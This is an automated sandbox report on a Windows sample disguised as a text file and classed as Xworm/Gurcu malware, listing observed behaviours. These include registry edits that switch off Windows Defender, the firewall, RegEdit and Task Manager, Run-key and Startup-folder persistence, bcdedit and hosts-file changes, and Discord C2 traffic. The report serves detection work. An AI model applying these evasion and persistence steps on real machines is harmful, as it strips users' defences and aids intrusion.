Malware Analysis Report

2025-04-13 12:20

Sample ID 250320-xfdk8awzdy
Target READ ME BEFOR OPEN.txt.exe
SHA256 159c1154b8553b15f7feebbb129b1a69ce1f24dea85e2837ad84160e1ce6dc5c
Tags
gurcu xworm defense_evasion discovery evasion execution exploit persistence privilege_escalation ransomware rat stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

159c1154b8553b15f7feebbb129b1a69ce1f24dea85e2837ad84160e1ce6dc5c

Threat Level: Known bad

The file READ ME BEFOR OPEN.txt.exe was found to be: Known bad.

Malicious Activity Summary

gurcu xworm defense_evasion discovery evasion execution exploit persistence privilege_escalation ransomware rat stealer trojan

Detect Xworm Payload

Xworm family

Gurcu family

Disables service(s)

Modifies Windows Defender DisableAntiSpyware settings

Modifies security service

Gurcu, WhiteSnake

Contains code to disable Windows Defender

Xworm

Modifies boot configuration data using bcdedit

Disables RegEdit via registry modification

Stops running service(s)

Sets file to hidden

Drops file in Drivers directory

Boot or Logon Autostart Execution: Active Setup

Modifies Windows Firewall

Command and Scripting Interpreter: PowerShell

Blocklisted process makes network request

Manipulates Digital Signatures

Disables Task Manager via registry modification

Possible privilege escalation attempt

Executes dropped EXE

Drops startup file

Modifies file permissions

Looks up external IP address via web service

Legitimate hosting services abused for malware hosting/C2

Enumerates connected drives

Power Settings

Adds Run key to start application

Network Share Discovery

File and Directory Permissions Modification: Windows File and Directory Permissions Modification

Sets desktop wallpaper using registry

Drops file in System32 directory

Launches sc.exe

Drops file in Windows directory

Browser Information Discovery

Event Triggered Execution: Netsh Helper DLL

Enumerates physical storage devices

Unsigned PE

Suspicious use of SendNotifyMessage

Uses Task Scheduler COM API

Suspicious use of WriteProcessMemory

Runs net.exe

Scheduled Task/Job: Scheduled Task

Suspicious use of AdjustPrivilegeToken

Uses Volume Shadow Copy WMI provider

Uses Volume Shadow Copy service COM API

Suspicious behavior: EnumeratesProcesses

Checks processor information in registry

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Enumerates system info in registry

Suspicious use of SetWindowsHookEx

Checks SCSI registry key(s)

Views/modifies file attributes

Modifies registry class

Kills process with taskkill

Modifies data under HKEY_USERS

Suspicious use of FindShellTrayWindow

Delays execution with timeout.exe

Suspicious behavior: GetForegroundWindowSpam

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Reported

2025-03-20 18:47

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2025-03-20 18:47

Reported

2025-03-20 19:05

Platform

win11-20250313-en

Max time kernel

898s

Max time network

903s

Command Line

"C:\Users\Admin\AppData\Local\Temp\READ ME BEFOR OPEN.txt.exe"

Signatures

Contains code to disable Windows Defender

Description Indicator Process Target
N/A N/A N/A N/A

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Disables service(s)

defense_evasion execution

Gurcu family

gurcu

Gurcu, WhiteSnake

stealer gurcu

Modifies Windows Defender DisableAntiSpyware settings

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" C:\Windows\system32\reg.exe N/A

Modifies security service

defense_evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\mpssvc\Start = "4" C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\mpssvc\Start = "4" C:\Windows\system32\reg.exe N/A

Xworm

trojan rat xworm

Xworm family

xworm

Modifies boot configuration data using bcdedit

ransomware evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\bcdedit.exe N/A
N/A N/A C:\Windows\system32\bcdedit.exe N/A
N/A N/A C:\Windows\system32\bcdedit.exe N/A
N/A N/A C:\Windows\system32\bcdedit.exe N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A N/A N/A

Boot or Logon Autostart Execution: Active Setup

persistence
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-994669834-3080981395-1291080877-1000\Software\Microsoft\Active Setup\Installed Components N/A N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Disables RegEdit via registry modification

defense_evasion
Description Indicator Process Target
Set value (int) \REGISTRY\USER\S-1-5-21-994669834-3080981395-1291080877-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" C:\Windows\system32\reg.exe N/A

Disables Task Manager via registry modification

defense_evasion

Drops file in Drivers directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\drivers\etc\hosts C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Windows\System32\drivers\etc\hosts C:\Windows\system32\cmd.exe N/A

Manipulates Digital Signatures

Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-994669834-3080981395-1291080877-1000\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Software\Rasauq on top\ C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Software\Rasauq on top\ C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top\ C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-994669834-3080981395-1291080877-1000\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top\ C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top\ C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top\ C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-994669834-3080981395-1291080877-1000\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top\ C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top\ C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top\ C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top\ C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top\ C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Software\Rasauq on top\ C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Software\Rasauq on top\ C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top\ C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Software\Rasauq on top\ C:\Windows\system32\reg.exe N/A

Modifies Windows Firewall

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A

Sets file to hidden

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\System32\attrib.exe N/A
N/A N/A C:\Windows\System32\attrib.exe N/A

Stops running service(s)

defense_evasion execution

Drops startup file

Description Indicator Process Target
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows Host Service.lnk C:\Users\Admin\AppData\Local\Temp\Rasauq SoftWorks.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows Host Service.lnk N/A N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows Host Service.lnk N/A N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ModMenu.bat C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ModMenu.bat C:\Windows\system32\cmd.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\hig.bat C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\hig.bat C:\Windows\system32\cmd.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows Host Service.lnk C:\Users\Admin\AppData\Local\Temp\Rasauq SoftWorks.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-994669834-3080981395-1291080877-1000\Software\Microsoft\Windows\CurrentVersion\Run\RasauqRemover = "\"\"" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-994669834-3080981395-1291080877-1000\Software\Microsoft\Windows\CurrentVersion\Run\Windows Service C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-994669834-3080981395-1291080877-1000\Software\Microsoft\Windows\CurrentVersion\Run\RasauqRemover = "\"\"" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-994669834-3080981395-1291080877-1000\Software\Microsoft\Windows\CurrentVersion\Run\Windows Host Service = "C:\\Users\\Admin\\AppData\\Local\\Windows Host Service.scr" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-994669834-3080981395-1291080877-1000\Software\Microsoft\Windows\CurrentVersion\Run\Windows Host Service = "C:\\Users\\Admin\\AppData\\Local\\Windows Host Service.scr" C:\Users\Admin\AppData\Local\Temp\Rasauq SoftWorks.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-994669834-3080981395-1291080877-1000\Software\Microsoft\Windows\CurrentVersion\Run\Windows Service C:\Windows\system32\reg.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\D: N/A N/A
File opened (read-only) \??\F: N/A N/A

File and Directory Permissions Modification: Windows File and Directory Permissions Modification

defense_evasion

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A discord.com N/A N/A
N/A discord.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A api64.ipify.org N/A N/A
N/A api64.ipify.org N/A N/A
N/A api64.ipify.org N/A N/A

Network Share Discovery

discovery

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\System32\Rasauq\$77RasauqBroker.bat C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Windows\System32\Rasauq\$77RasauqBroker.bat C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Windows\System32\Rasauq\$77RasauqBroker.bat C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Windows\system32\Recovery\ReAgent.xml C:\Windows\system32\ReAgentc.exe N/A
File opened for modification C:\Windows\System32\$666-RasauqBroker.bat C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Windows\system32\Recovery C:\Windows\system32\ReAgentc.exe N/A
File created C:\Windows\System32\$666-RasauqBroker.bat C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Windows\System32\$666-RasauqBroker.bat C:\Windows\system32\cmd.exe N/A

Sets desktop wallpaper using registry

ransomware
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-994669834-3080981395-1291080877-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\IMG_3728.png" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-994669834-3080981395-1291080877-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\IMG_3728.png" C:\Windows\system32\reg.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\Panther\UnattendGC\setuperr.log C:\Windows\system32\ReAgentc.exe N/A
File opened for modification C:\Windows\Panther\UnattendGC\diagwrn.xml C:\Windows\system32\ReAgentc.exe N/A
File opened for modification C:\Windows\Panther\UnattendGC\setuperr.log C:\Windows\system32\ReAgentc.exe N/A
File opened for modification C:\Windows\Panther\UnattendGC\diagerr.xml C:\Windows\system32\ReAgentc.exe N/A
File opened for modification C:\Windows\SystemTemp C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File opened for modification C:\Windows\Logs\ReAgent\ReAgent.log C:\Windows\system32\ReAgentc.exe N/A
File opened for modification C:\Windows\Panther\UnattendGC\diagerr.xml C:\Windows\system32\ReAgentc.exe N/A
File opened for modification C:\Windows\Panther\UnattendGC\diagwrn.xml C:\Windows\system32\ReAgentc.exe N/A
File opened for modification C:\Windows\Logs\ReAgent\ReAgent.log C:\Windows\system32\ReAgentc.exe N/A

Launches sc.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A

Browser Information Discovery

discovery

Enumerates physical storage devices

Event Triggered Execution: Netsh Helper DLL

persistence privilege_escalation
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\000E C:\Windows\system32\powercfg.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\FriendlyName N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0003 C:\Windows\system32\powercfg.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\HardwareID C:\Windows\system32\powercfg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 C:\Windows\system32\powercfg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0020 C:\Windows\system32\powercfg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0002 C:\Windows\system32\powercfg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0020 C:\Windows\system32\powercfg.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\FriendlyName C:\Windows\system32\powercfg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\000E C:\Windows\system32\powercfg.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\HardwareID C:\Windows\system32\powercfg.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName C:\Windows\system32\powercfg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0020 C:\Windows\system32\powercfg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0020 C:\Windows\system32\powercfg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\000E C:\Windows\system32\powercfg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0020 C:\Windows\system32\powercfg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\000E C:\Windows\system32\powercfg.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID C:\Windows\system32\powercfg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\000E C:\Windows\system32\powercfg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001 C:\Windows\system32\powercfg.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0020 C:\Windows\system32\powercfg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0002 C:\Windows\system32\powercfg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0002 C:\Windows\system32\powercfg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0100 C:\Windows\system32\powercfg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0002 C:\Windows\system32\powercfg.exe N/A
